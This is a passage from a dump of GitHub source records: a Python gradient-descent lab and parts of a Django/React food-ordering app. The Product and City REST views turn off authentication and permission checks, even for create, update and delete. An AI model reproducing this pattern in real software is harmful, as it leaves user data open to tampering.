lc.classify_noregular()\n lc.classify_withregular()\n \nif __name__ == '__main__':\n main()"
},
{
"alpha_fraction": 0.4887250065803528,
"alphanum_fraction": 0.5048929452896118,
"avg_line_length": 31.474655151367188,
"blob_id": "dc442b20edfeeb78b7d5c1bbd260b2294e4660fd",
"content_id": "179bfff8507ba725d0a522fa1878024a11791491",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7990,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 217,
"path": "/lab1/gradient_descent.py",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nclass gradient_descent:\n '''\n 最小二乘法的梯度下降解法,这里数据由[start,end]间的高斯函数随机生成\n '''\n def __init__(self, train_N=50, valid_N=50, test_N=50, order=6, start=0, end=1, eta=0.1):\n '''\n 构造函数\n train_N:训练数据的规模\n valid_N:验证数据的规模\n test_N :测试数据的规模\n order :模拟的多项式阶数\n start :生成数据的起点\n end :生成数据的终点\n eta :学习率\n '''\n #根据给定参数随机生成数据\n all_data = self.get_data(train_N, valid_N, test_N, order, start, end)\n self.train_data = all_data[0]\n self.train_x = all_data[1]\n self.train_label = all_data[2]\n self.valid_data = all_data[3]\n self.valid_x = all_data[4]\n self.valid_label = all_data[5]\n self.test_data = all_data[6]\n self.test_x = all_data[7]\n self.test_label = all_data[8]\n self.order = order\n self.eta = eta\n '''\n print('train_data:')\n print(self.train_data)\n print('valid_data:')\n print(self.valid_data)\n print('test_data:')\n print(self.test_data)\n '''\n \n def get_data(self, train_N, valid_N, test_N, order, start, end):\n '''\n 随机生成数据\n train_N:训练数据的规模\n valid_N:验证数据的规模\n test_N :测试数据的规模\n order :模拟的多项式阶数\n start :生成数据的起点\n end :生成数据的终点\n ''' \n \n #pi值\n pi = np.pi\n\n #添加的高斯噪声的均值与方差\n mu = 0\n sigma = 0.12\n X = np.ones((train_N, order+1))\n \n #生成x矩阵\n for i in range(train_N):\n for j in range(order+1):\n X[i][j] = np.power(start + i*(end-start)/train_N, j)\n\n #存储真实值列向量\n t = []\n #存储所取到的x值\n x = []\n\n #真实函数值&添加噪声\n for i in range(train_N):\n x.append(X[i][1])\n f_x = np.sin(2*pi*X[i][1])+random.gauss(mu, sigma) #在for循环中根据x值生成正弦函数值\n t.append(f_x) #加入到真实值列表中\n \n #转为列向量\n t = np.array(t) \n t = t.reshape(-1, 1)\n \n #验证数据集,用来确定超参数lamda\n validation_x = []\n validation_X = np.ones((valid_N, order+1))\n t_validation = []\n for i in range(valid_N):\n ran_num = random.randrange(0,100*valid_N)/(100*valid_N)\n while(ran_num in x):\n ran_num = random.randrange(0,100*valid_N)/(100*valid_N)\n validation_x.append(ran_num)\n\n validation_x.sort()\n for i in range(valid_N):\n for j in range(order+1):\n validation_X[i][j] = np.power(validation_x[i], j)\n t_validation.append(np.sin(2*pi*validation_x[i]))\n t_validation = np.array(t_validation)\n t_validation = t_validation.reshape(-1, 1)\n \n #测试数据集,评估模型效果\n test_x=[]\n t_test=[]\n test_X=np.ones((test_N, order+1))\n for i in range(test_N):\n ran_num = random.randrange(0,100*test_N)/(100*test_N)\n while(ran_num in x or ran_num in validation_x):\n ran_num = random.randrange(0,100*test_N)/(100*test_N)\n test_x.append(ran_num)\n \n test_x.sort()\n for i in range(test_N):\n for j in range(order+1):\n test_X[i][j] = np.power(test_x[i], j)\n t_test.append(np.sin(2*pi*test_x[i]))\n t_test = np.array(t_test)\n t_test = t_test.reshape(-1, 1)\n \n return (X, x, t, validation_X, validation_x, t_validation, test_X, test_x, t_test)\n\n def lossfunc(self, data, label, parameter, lamda):\n '''\n 损失函数(带有正则项)\n data :数据\n label :标签\n parameter :参数\n lamda :正则系数\n '''\n mat = np.dot(data, parameter) - label\n result_mat = np.dot(mat.T, mat) + 0.5*np.dot(parameter.T, parameter)*lamda\n return result_mat[0][0]\n \n def gradient_reg_descent(self):\n '''\n 梯度下降法参数求解\n ''' \n #用矩阵运算w=w-(eta/m)*(X^T·X·w-X^T·t)更新w,将共性运算X^T·X与X^T·t提取出来进行加速\n s = np.dot(self.train_data.T, self.train_data)\n q = np.dot(self.train_data.T, self.train_label)\n\n #正则项参数lamda,5种选择,从中挑选\n lamda_0 = 3e-7\n lamda = []\n for i in range(5):\n lamda.append(lamda_0*np.power(10, i))\n\n #存储在选取不同lamda情况下验证集上的最小二乘误差\n min_validation_loss = 1e7\n \n #遍历lamda的值,用验证集上的最小二乘误差确定最优的lamda取值\n for i in range(5):\n #初始化参数为0,以及求正则项函数的初始差值\n w_reg = [0]*(self.order + 1)\n w_reg = np.array(w_reg)\n w_reg = w_reg.reshape(1, self.order+1)\n w_reg = w_reg.T\n loss0_reg = 0\n loss1_reg = self.lossfunc(self.train_data, self.train_label, w_reg, lamda[i])\n '''\n print('loss1_reg')\n print(loss1_reg)\n '''\n while(abs(loss1_reg-loss0_reg)>1e-10):\n w_temp = w_reg*(1-self.eta*lamda[i]/len(self.train_x))-self.eta*(np.dot(s, w_reg)-q)#/len(self.train_x)\n loss0_reg = loss1_reg\n loss1_reg = self.lossfunc(self.train_data, self.train_label, w_temp, lamda[i])\n #后一次差值变大,证明步长过长,步长减半,重新计算\n if(loss1_reg>loss0_reg):\n self.eta/=2\n continue\n w_reg = w_temp\n \n #求出验证集上的损失函数值\n temp_validation_loss = self.lossfunc(self.valid_data, self.valid_label, w_reg, lamda[i])\n \n #挑选最小损失值的超参数lamda\n if(temp_validation_loss < min_validation_loss):\n lamda_flag = i\n min_validation_loss = temp_validation_loss\n w = w_reg\n \n #把每一个超参lamda对应的图像都画出来\n w_reg = np.array(w_reg)\n w_reg = np.squeeze(w_reg)\n w_reg = w_reg[::-1]\n func_reg = np.poly1d(w_reg)\n valid_reg = func_reg(self.valid_x)\n plt.title('Valid data with Regular Item: order=%d , datasize=%d, lamda=%.8f' %(self.order , len(self.valid_x), lamda[i]))\n plt.scatter(self.valid_x, self.valid_label)\n plt.plot(self.valid_x, valid_reg)\n plt.xlabel('x')\n plt.ylabel('validation_reg(x)')\n plt.show()\n\n #打印出最终选取的lamda取值\n print('选取的lamda为: %.8f' %lamda[lamda_flag])\n\n test_loss=self.lossfunc(self.test_data, self.test_label, w, lamda[lamda_flag])\n print('加正则项模型的测试集误差为: %f' %test_loss)\n\n #用测试集数据评估模型效果,画图\n w_t = w.T\n w_t = np.array(w_t)\n w_t = np.squeeze(w_t)\n w_t = w_t[::-1]\n func_reg = np.poly1d(w_t)\n test_reg = func_reg(self.test_x)\n plt.title('Test data with Regular Item: order=%d , datasize=%d, lamda=%.8f' %(self.order, len(self.test_x), lamda[lamda_flag]))\n plt.scatter(self.test_x, self.test_label)\n plt.plot(self.test_x, test_reg)\n plt.xlabel('x')\n plt.ylabel('y_reg(x)')\n plt.show()\n\nif __name__ == '__main__':\n answer = gradient_descent()\n answer.gradient_reg_descent()\n "
}
] | 8 |
rawda-yasser/FoodOrder_Django | https://github.com/rawda-yasser/FoodOrder_Django | 59a47181d80596d600ab8e61785768ace7950b5c | e25769eb3abb12de7124f4ddb949546162292e1a | 87fbf581f4a31852c4fedcc85cb8b96087f387a0 | refs/heads/master | 2023-06-22T11:34:26.889204 | 2018-07-01T11:03:05 | 2018-07-01T11:03:05 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.624535322189331,
"alphanum_fraction": 0.624535322189331,
"avg_line_length": 15.800000190734863,
"blob_id": "cbff1ffed70667f1e4fe1b17f6f9775c87420b06",
"content_id": "54d5a7e27473dbf5d670786833b2f71a20fa72a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 15,
"path": "/foodcartapp/forms/LocationForms.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\r\nfrom foodcartapp.models import *\r\n\r\n\r\n\r\nclass AddLocation(ModelForm):\r\n class Meta:\r\n model=Location\r\n exclude=[]\r\n\r\n\r\nclass UpdateLocation(ModelForm):\r\n class Meta:\r\n model=Location\r\n exclude=[]\r\n\r\n"
},
{
"alpha_fraction": 0.669573187828064,
"alphanum_fraction": 0.6792106628417969,
"avg_line_length": 33.721309661865234,
"blob_id": "74f419a31ca76d2fc033de44961776458935e0b4",
"content_id": "c814ed3ab71fc7f789da4aea3591c69cbf0dfd82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2179,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 61,
"path": "/foodcartapp/RESTviews/ProductRestView.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import status\r\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\r\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom foodcartapp.models import Product\r\nfrom foodcartapp.serializers.product_serializer import ProductSerializer\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef product_list_api(request):\r\n \"\"\"\r\n List all code snippets, or create a new snippet.\r\n \"\"\"\r\n if request.method == 'GET':\r\n products = Product.objects.all()\r\n serializer = ProductSerializer(products, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = ProductSerializer(data=request.query_params)\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef product_detail_api(request, pk):\r\n \"\"\"\r\n Retrieve, update or delete a code snippet.\r\n \"\"\"\r\n try:\r\n product = Product.objects.get(pk=pk)\r\n except product.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = ProductSerializer(product)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = ProductSerializer(product, data=request.query_params)\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n return Response(serializer.data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n elif request.method == 'DELETE':\r\n product.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n"
},
{
"alpha_fraction": 0.6614950895309448,
"alphanum_fraction": 0.6713681221008301,
"avg_line_length": 32.86885070800781,
"blob_id": "68797637339ce3be60132e2d3eed33de1c4dd845",
"content_id": "4c4114b5607efba1a94198f87cc381727e1c4615",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2127,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 61,
"path": "/foodcartapp/RESTviews/CityRestView.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import status\r\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\r\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom foodcartapp.models import City\r\nfrom foodcartapp.serializers.city_serializer import CitySerializer\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef city_list_api(request):\r\n \"\"\"\r\n List all code snippets, or create a new snippet.\r\n \"\"\"\r\n if request.method == 'GET':\r\n cities = City.objects.all()\r\n serializer = CitySerializer(cities, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = CitySerializer(data=request.query_params)\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef city_detail_api(request, pk):\r\n \"\"\"\r\n Retrieve, update or delete a code snippet.\r\n \"\"\"\r\n try:\r\n city = City.objects.get(pk=pk)\r\n except City.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = CitySerializer(city)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = CitySerializer(city, data=request.query_params)\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n return Response(serializer.data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n elif request.method == 'DELETE':\r\n city.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n"
},
{
"alpha_fraction": 0.46107783913612366,
"alphanum_fraction": 0.4658682644367218,
"avg_line_length": 33.553192138671875,
"blob_id": "24a5503fa0ab7bbcb4ba0bbe2caf2040cad654a0",
"content_id": "c622fc19c6d9801b98176676643aba42b7e05f45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3341,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 94,
"path": "/src/components/CartModalComponent.js",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "import React,{Component} from 'react';\r\nimport CSSTransitionGroup from 'react-transition-group/CSSTransitionGroup';\r\nimport EmptyCart from './EmptyCart';\r\nimport { Button } from 'react-bootstrap';\r\nimport {Modal} from 'react-bootstrap';\r\nimport {Table} from 'react-bootstrap';\r\n\r\nclass CartModalComponent extends Component{\r\n\r\n\r\n constructor(props){\r\n super(props);\r\n this.state = {\r\n cart: this.props.cartItems\r\n };\r\n }\r\n\r\n\r\n render(){\r\n\r\n let cartItems;\r\n const imgStyle={\r\n width:\"50px\",\r\n height:\"50px\"\r\n };\r\n cartItems =this.state.cart.map(product =>{\r\n return(\r\n <CSSTransitionGroup transitionName=\"fadeIn\" key={product.id} component=\"tr\" transitionEnterTimeout={500} transitionLeaveTimeout={300}>\r\n <td>{product.id}</td>\r\n <td><img src={product.image} style={imgStyle} /></td>\r\n <td>{product.name}</td>\r\n <td>{product.price}</td>\r\n <td>{product.quantity} {product.quantity > 1 ?\"Nos.\" : \"No.\" } </td>\r\n <td>{product.quantity * product.price}</td>\r\n <td><a href=\"#\" onClick={this.props.removeProduct.bind(this, product.id)}>×</a></td>\r\n </CSSTransitionGroup>\r\n )\r\n });\r\n \r\n let view;\r\n if(cartItems.length <= 0){\r\n view = <EmptyCart />\r\n } else{\r\n view = (<Table responsive>\r\n <thead>\r\n <tr>\r\n <th>ProductID</th>\r\n <th>Image</th>\r\n <th>Name</th>\r\n <th>Price</th>\r\n <th>Quantity</th>\r\n <th>Price</th>\r\n <th></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n \r\n {cartItems}\r\n \r\n </tbody>\r\n </Table>)\r\n }\r\n\r\n\r\n return (\r\n <Modal show={this.props.showCart} onHide={this.props.handleCartClose}>\r\n <Modal.Header closeButton>\r\n <h2><center><Modal.Title>Cart</Modal.Title></center></h2>\r\n </Modal.Header>\r\n <Modal.Body>\r\n \r\n {view}\r\n \r\n </Modal.Body>\r\n <Modal.Footer>\r\n <Button id=\"checkout\" onClick={(event)=>{\r\n document.getElementById('checkout').style.pointerEvents = 'none';\r\n document.getElementById(\"checkout\").setAttribute(\"disabled\", \"disabled\");\r\n if(this.props.cartItems.length>0)\r\n this.props.checkOut();\r\n //this.props.handleCartClose();\r\n document.getElementById('checkout').style.pointerEvents = 'auto'; \r\n //document.getElementById(\"checkout\").removeAttribute(\"disabled\");\r\n }} className={this.props.cartItems.length>0 ? \"btn btn-danger\" : \"disabled btn btn-danger\"}>PROCEED TO CHECKOUT</Button>\r\n <Button onClick={this.props.handleCartClose}>Close</Button>\r\n </Modal.Footer>\r\n </Modal>\r\n );\r\n }\r\n\r\n\r\n}\r\n\r\nexport default CartModalComponent;"
},
{
"alpha_fraction": 0.6007905006408691,
"alphanum_fraction": 0.6007905006408691,
"avg_line_length": 14.733333587646484,
"blob_id": "9fd26fb97decafa306a4ab272e74ffb0a240f428",
"content_id": "94c06c4cc4df2322e342d9947c5f4b75d1e64655",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 253,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 15,
"path": "/foodcartapp/forms/CityForms.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\r\nfrom foodcartapp.models import *\r\n\r\n\r\n\r\nclass AddCity(ModelForm):\r\n class Meta:\r\n model=City\r\n exclude=[]\r\n\r\n\r\nclass UpdateCity(ModelForm):\r\n class Meta:\r\n model=City\r\n exclude=[]\r\n\r\n"
},
{
"alpha_fraction": 0.7512195110321045,
"alphanum_fraction": 0.7512195110321045,
"avg_line_length": 29.538461685180664,
"blob_id": "3bacc9ff6e2301c1d97403f8ec4a290da6cbd1cd",
"content_id": "4aa972df56ec1827cd6d586b0b4f101df447ae87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 13,
"path": "/foodcartapp/serializers/orderdetails_serializer.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\r\n\r\nfrom foodcartapp.models import OrderDetails\r\n\r\nclass OrderDetailsSerializer(serializers.Serializer):\r\n order_id =serializers.IntegerField()\r\n product_id=serializers.IntegerField()\r\n quantity=serializers.IntegerField()\r\n\r\n\r\n def create(self, validated_data):\r\n orderdetails=OrderDetails.objects.create(**validated_data)\r\n return orderdetails\r\n"
},
{
"alpha_fraction": 0.738095223903656,
"alphanum_fraction": 0.738095223903656,
"avg_line_length": 28.14285659790039,
"blob_id": "081c3107503bbd562bf58fb336ab9ec8c01bbc3b",
"content_id": "55e3e5f28ce4b239bdc09c8fc81cbee5301f0357",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 14,
"path": "/foodcartapp/serializers/hotel_serializer.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from rest_framework.serializers import ModelSerializer\r\n\r\nfrom foodcartapp.models import Hotel\r\nfrom foodcartapp.serializers.location_serializer import LocationSerializer\r\n\r\n\r\nclass HotelSerializer(ModelSerializer):\r\n location=LocationSerializer(many=False)\r\n class Meta:\r\n model=Hotel\r\n fields='__all__'\r\n\r\n def create(self, validated_data):\r\n return Hotel.objects.create(**validated_data)"
},
{
"alpha_fraction": 0.6788830757141113,
"alphanum_fraction": 0.6791739463806152,
"avg_line_length": 38.42353057861328,
"blob_id": "47d2d598b3ef7cbc74d3b94a4638dd541d4121f5",
"content_id": "c61f85591d37881caf363a9b46654c8150f72c98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3438,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 85,
"path": "/foodcartapp/views/HotelViews.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin\r\nfrom django.shortcuts import redirect\r\nfrom django.urls import reverse_lazy\r\nfrom django.views.generic import ListView, CreateView,UpdateView,DeleteView\r\nfrom foodcartapp.forms.HotelForms import UpdateHotel, AddHotel\r\nfrom foodcartapp.models import *\r\n\r\n\r\n\r\nclass PermissionHelper(PermissionRequiredMixin):\r\n def has_permission(self):\r\n user = Hotel.objects.values('hoteladmin__id').get(id=self.kwargs['pk'])\r\n user_id = user['hoteladmin__id']\r\n if self.request.user.id == user_id:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nclass hotel_list_view(LoginRequiredMixin,ListView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model =Hotel\r\n template_name = \"hotel_list.html\"\r\n permission_denied_message = \"User does not have permission to view Hotel\"\r\n context_object_name = \"hotel_list\"\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super(hotel_list_view, self).get_context_data(**kwargs)\r\n context['hotel_list'] = Hotel.objects.filter(hoteladmin__id=self.request.user.id)\r\n context['Name'] = User.objects.get(id=self.request.user.id).username\r\n # if(len(context['card_list'])!=0):\r\n # context['hotel']=Product.objects.values('hotel__name').filter(user__id=self.request.user.id)\r\n return context\r\n\r\n\r\n\r\nclass AddHotelView(LoginRequiredMixin,CreateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n template_name = 'add_hotel.html'\r\n form_class = AddHotel\r\n # permission_required = \"foodcartapp.add_hotel\"\r\n permission_denied_message = \"User does not have permission to add Hotel\"\r\n raise_exception = True\r\n model = Hotel\r\n success_url = reverse_lazy(\"foodcartapp:HotelView\")\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super(AddHotelView, self).get_context_data(**kwargs)\r\n context['location'] = Location.objects.all()\r\n return context\r\n\r\n def post(self, request, *args, **kwargs):\r\n form = AddHotel(request.POST)\r\n if form.is_valid():\r\n post = form.save(commit=False)\r\n post.hoteladmin = CustomUser.objects.get(id=request.user.id)\r\n post.save()\r\n return redirect(\"foodcartapp:HotelView\")\r\n\r\n\r\nclass UpdateHotelView(LoginRequiredMixin,PermissionHelper,UpdateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = Hotel\r\n permission_required = \"foodcartapp.change_hotel\"\r\n permission_denied_message = \"User does not have permission to change Hotel\"\r\n raise_exception = True\r\n form_class = UpdateHotel\r\n template_name = \"update_hotel.html\"\r\n success_url = reverse_lazy(\"foodcartapp:HotelView\")\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super(UpdateHotelView, self).get_context_data(**kwargs)\r\n context['hotel'] = Hotel.objects.get(id=self.kwargs['pk'])\r\n context['location']=Location.objects.all()\r\n return context\r\n\r\n\r\nclass DeleteHotelView(LoginRequiredMixin,PermissionHelper,DeleteView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = Hotel\r\n template_name = \"hotel_confirm_delete.html\"\r\n permission_required = \"foodcartapp.delete_hotel\"\r\n permission_denied_message = \"User does not have permission to delete hotel\"\r\n raise_exception = True\r\n success_url = reverse_lazy(\"foodcartapp:HotelView\")\r\n\r\n"
},
{
"alpha_fraction": 0.6399999856948853,
"alphanum_fraction": 0.6399999856948853,
"avg_line_length": 20.75,
"blob_id": "2812e8d02414623385acd98d805774b0076f74b7",
"content_id": "d8d266f8b16b43fe67f50a2d93d9d74714c41af8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 12,
"path": "/foodcartapp/forms/HotelForms.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\r\nfrom foodcartapp.models import *\r\n\r\nclass AddHotel(ModelForm):\r\n class Meta:\r\n model=Hotel\r\n exclude=['hoteladmin']\r\n\r\nclass UpdateHotel(ModelForm):\r\n class Meta:\r\n model=Hotel\r\n exclude=['hoteladmin']\r\n\r\n"
},
{
"alpha_fraction": 0.5137399435043335,
"alphanum_fraction": 0.5174262523651123,
"avg_line_length": 36.02547836303711,
"blob_id": "81b3394916ae45348e3ef259d5dae533cb3a3910",
"content_id": "7c15531d44e8486881cfc1c1fbf6b2681f499ed6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5968,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 157,
"path": "/src/components/SignupModalComponent.js",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "import React,{Component} from 'react';\r\nimport {Modal} from 'react-bootstrap';\r\nimport {Button} from 'react-bootstrap';\r\nimport Cookies from 'universal-cookie';\r\n\r\nclass SignupModalComponent extends Component{\r\n\r\n constructor(props){\r\n super(props);\r\n }\r\n\r\n cookies = new Cookies();\r\n state = {\r\n url:\"/api/user_signup/\",\r\n //buttonName : 'Login',\r\n username : \"\" ,\r\n password: \"\",\r\n firstname:\"\",\r\n lastname:\"\",\r\n phonenumber:\"\",\r\n pincode:\"\",\r\n address:\"\"\r\n }\r\n\r\n saveUsername = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n username : value\r\n })\r\n }\r\n\r\n saveFirstname = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n firstname : value\r\n })\r\n }\r\n\r\n saveLastname = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n lastname : value\r\n })\r\n }\r\n\r\n savePassword = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n password : value\r\n })\r\n }\r\n\r\n savePhonenumber = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n phonenumber : value\r\n })\r\n }\r\n \r\n savePincode = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n pincode : value\r\n })\r\n }\r\n\r\n saveAddress = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n address : value\r\n })\r\n }\r\n\r\n submit = (e) => {\r\n e.preventDefault();\r\n this.signup(this.state)\r\n }\r\n\r\n signup =({username,password,firstname,lastname,phonenumber,pincode,address})=>{\r\n console.log(username + \" : \"+password+\" : \"+firstname+\" : \"+lastname+\":\"+phonenumber+\":\"+pincode+\":\"+address);\r\n var formData = new FormData();\r\n formData.append('username', username);\r\n formData.append('password', password);\r\n formData.append('first_name',firstname);\r\n formData.append('last_name',lastname);\r\n formData.append('phone_number',phonenumber);\r\n formData.append('pincode',pincode);\r\n formData.append('address',address);\r\n fetch(this.state.url, { \r\n method: 'post',\r\n body: formData, \r\n }) .then(function(response) {\r\n return response.json();\r\n })\r\n .then((myJson) => {\r\n if ('token' in myJson){\r\n this.cookies.set('userJwtToken', myJson, { path: '/',expires: new Date(Date.now()+2592000)} );\r\n this.cookies.set('username',formData.get('username'), {path : '/', expires: new Date(Date.now()+2592000)})\r\n console.log(this.cookies.get('userJwtToken'));\r\n console.log('After getting token');\r\n this.props.toggleisAuthenticated();\r\n this.props.handleSignupModalClose();\r\n }\r\n else{\r\n alert(\"Invalid Credentials\");\r\n }\r\n })\r\n .catch(e => {console.log(\"Error occured in Signup\")});\r\n }\r\n\r\n\r\n render(){\r\n return(\r\n \r\n <Modal show={this.props.signupModalActive} onHide={this.props.handleSignupModalClose}>\r\n <Modal.Header closeButton>\r\n <h2><center><Modal.Title>Signup</Modal.Title></center></h2>\r\n </Modal.Header>\r\n <Modal.Body> \r\n <div className=\"form-group container-fluid\">\r\n <label htmlFor=\"username\">Username:</label>\r\n <input onChange={this.saveUsername} required id=\"username\" type=\"text\" className=\"form-control\" placeholder=\"Enter username\"/><br/>\r\n <label htmlFor=\"password\">Password:</label>\r\n <input onChange={this.savePassword} required id=\"password\" type=\"password\" className=\"form-control\" placeholder=\"Enter Password\"/><br/>\r\n <label htmlFor=\"firstname\">First Name:</label>\r\n <input onChange={this.saveFirstname} required id=\"firstname\" type=\"text\" className=\"form-control\" placeholder=\"Enter First Name\"/><br/>\r\n <label htmlFor=\"lastname\">Last Name:</label>\r\n <input onChange={this.saveLastname} required id=\"lastname\" type=\"text\" className=\"form-control\" placeholder=\"Enter Last Name\"/><br/>\r\n <label htmlFor=\"phonenumber\">Phone Number:</label>\r\n <input onChange={this.savePhonenumber} required id=\"phonenumber\" maxLength=\"10\" type=\"text\" className=\"form-control\" placeholder=\"Enter Phone Number\"/><br/>\r\n <label htmlFor=\"pincode\">Pincode:</label>\r\n <input onChange={this.savePincode} required id=\"pincode\" type=\"text\" maxLength=\"7\" className=\"form-control\" placeholder=\"Enter Pincode\"/><br/>\r\n <label htmlFor=\"address\">Address:</label>\r\n <input onChange={this.saveAddress} required id=\"address\" type=\"text\" maxLength=\"256\" className=\"form-control\" placeholder=\"Enter Address\"/><br/>\r\n \r\n </div>\r\n \r\n </Modal.Body>\r\n <Modal.Footer>\r\n <Button id=\"signup\" onClick={(events)=>{\r\n document.getElementById(\"signup\").setAttribute(\"disabled\",\"disabled\");\r\n this.submit(events);\r\n document.getElementById(\"signup\").removeAttribute(\"disabled\");\r\n }} className=\"btn btn-primary\" value=\"Signup\">Signup</Button>\r\n <Button onClick={this.props.handleSignupModalClose}>Close</Button>\r\n </Modal.Footer>\r\n </Modal>\r\n \r\n\r\n\r\n );\r\n }\r\n\r\n\r\n}\r\n\r\nexport default SignupModalComponent;"
},
{
"alpha_fraction": 0.7657657861709595,
"alphanum_fraction": 0.7657657861709595,
"avg_line_length": 26.25,
"blob_id": "1d716422c228acae4607f68f872d6a32d0642794",
"content_id": "693ac09dee6b08ac3c1d1b95ea61b71ef5673da2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 111,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 4,
"path": "/foodcartapp/forms/__init__.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
